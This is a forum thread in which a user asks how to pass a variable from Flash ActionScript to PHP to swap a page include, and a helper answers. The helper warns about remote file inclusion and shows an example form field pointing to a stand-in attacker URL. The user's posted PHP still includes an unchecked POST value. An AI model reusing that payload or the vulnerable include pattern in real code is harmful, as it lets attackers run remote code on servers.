A Flash Developer Resource Site

Thread: Send PHP variable from Flash

Send PHP variable from Flash

Hello,

I posted this in a different section of the forum but it definitely belongs here.

Problem: I've built a site largely in PHP with some Flash. I want to change the content of a div from one php include to another on press of a button in Flash.

I am working in Flash 10 AS 2.0.

In my php file, I currently have the following script in my div:

<?php
    if(isset($paper)) {
    include($paper);
    } else {
    include("plainpaper.php");
    }
    ?>

plainpaper.php shows up on initial page load, so it's definitely not getting the variable from Flash.

In Flash I currently have:

on (press) {
    myVars = new LoadVars();
    myVars.paper = "biotech1_text.php";
    myVars.sendAndLoad("http://www.farason.com/robotic_cells.php", myVars, "POST");
    }

I've searched all over online, and haven't found actionscript that works. Any suggestions would be very much appreciated.

Thanks in advance!
    Christine

Hi,

try to add one line here
    Code:
    <?php
    $paper = $_POST['paper'];
    I would like to warn you that this kind of scripting exposes your site to hacking. Suppose your server allows including http resources (some block that), and a visitor submits a form like that - with html file just on the local machine
    Code:
    <form action="http://www.farason.com/robotic_cells.php" method=post>
    <input type=hidden name=paper value="http://www.something-evil.com/exploits/tryinclude.php">
    It is good practice to
    - either refuse to accept / in the supplied name (blocks access to different folder as well as to remote resources) - code like
    Code:
    if(ereg("/", $paper)) die("there was a problem with the file you requested");
    - or supply a list of allowed names
    Also it might be an idea to create a "papers" folder and change the include to
    Code:
     if(isset($paper)) {
    include("papers/$paper");
    } else {
    include("papers/plainpaper.php");
    }
    Musicman

Thank you! That's great advice about the security, which I will definitely implement. I tried adding

<?php
    $paper = $_POST['paper'];

yesterday and it unfortunately did not work.

Hi,

I just tried to send to that script, and got an error 404: "The requested URL /robotic_cells.php was not found on this server."

Musicman

Oops

I corrected that error, and tried but still not luck. This is the correct script:

on (press) {
    myVars = new LoadVars();
    myVars.paper = "biotech1_text.php";
    myVars.sendAndLoad("http://www.ccollister.com/farason/php/robotic_cells.php", myVars, "POST");
    }

If you'd still like to help

I changed the actionscript to the following:

on (press) {
    var LV:LoadVars = new LoadVars();
    LV.paper = "biotech1_text.php";
    LV.onLoad = function() {
    trace(LV.result);
    }
    LV.sendAndLoad("http://ccollister.com/farason/php/robotic_cells.php", LV, "POST");

It appears to be working. There are parameters in the Flash file to test the script, and I get the result 'php received the variablebiotech1_text.php' at the top of my php page in the Flash preview. Even though my php file is receiving the variable, it's not interacting with the script which looks like this:

Above my header:
    <?php $paper = $_POST["paper"]; ?>

In the div:
    <?php
    if(isset($paper)) {
    include($paper);
    } else {
    include("plainpaper.php");
    }
    if(ereg("/", $paper)) die("there was a problem with the file you requested");
    ?>

Am I on the right track?
    Last edited by christinemarie; 03-16-2009 at 08:37 PM. Reason: Changed some of the script

Hi,

one thing that looks a bit strange: sendandload is intended to load variables into flash, but the data you load looks like a web page. What is going on there?

Musicman

Well, that's taken from a script I found online that seemed like it was working. I thought since it was using the POST function that it was sending the variable, not loading it.

My main goal is to send a variable from Flash to my PHP file, at the press of a button within Flash. It will change the contents of one <div> in my PHP file.

I had an iFrame in place, which was changing at the click of a button from Flash, but wanted to streamline everything into PHP. Should I revert back to that?
    Last edited by christinemarie; 03-17-2009 at 07:58 AM.

Hi,

there are just two ways to change something on a web page, besides the iframe: one ir to reload the entire page (you would use send() rather than sendandload() from flash), the other one requires javascript within the web page to alter contents of that div.
    Of course a flash movie could call that javascript...

There is still the problem that your php does not seem to include the proper data

Musicman

I switched back to using iFrames. It was working the way I needed it to, so I suppose you could apply the phrase 'If it ain't broke, don't fix it' here

I would streamline everything to PHP if possible, but it seemed as though it was eating up way too much time.

Anyway, thanks for all your help